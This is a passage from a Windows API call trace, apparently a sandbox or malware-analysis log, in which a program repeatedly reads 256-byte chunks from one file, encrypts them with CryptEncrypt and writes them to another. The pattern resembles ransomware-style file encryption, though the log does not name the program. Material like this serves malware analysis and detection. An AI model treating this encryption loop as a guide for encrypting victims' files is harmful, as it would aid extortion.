lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.677] GetLastError () returned 0x0 [0144.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.677] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.677] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.678] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.678] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.678] GetLastError () returned 0x0 [0144.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.679] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.679] GetLastError () returned 0x0 [0144.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.679] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.680] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.680] GetLastError () returned 0x0 [0144.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.680] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.680] GetLastError () returned 0x0 [0144.680] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.680] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.680] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.685] GetLastError () returned 0x0 [0144.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.685] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.685] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.685] GetLastError () returned 0x0 [0144.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.685] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.685] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.685] GetLastError () returned 0x0 [0144.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.685] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.685] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.685] GetLastError () returned 0x0 [0144.685] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.685] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.685] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.686] GetLastError () returned 0x0 [0144.686] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.686] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.686] CryptEncrypt (in: 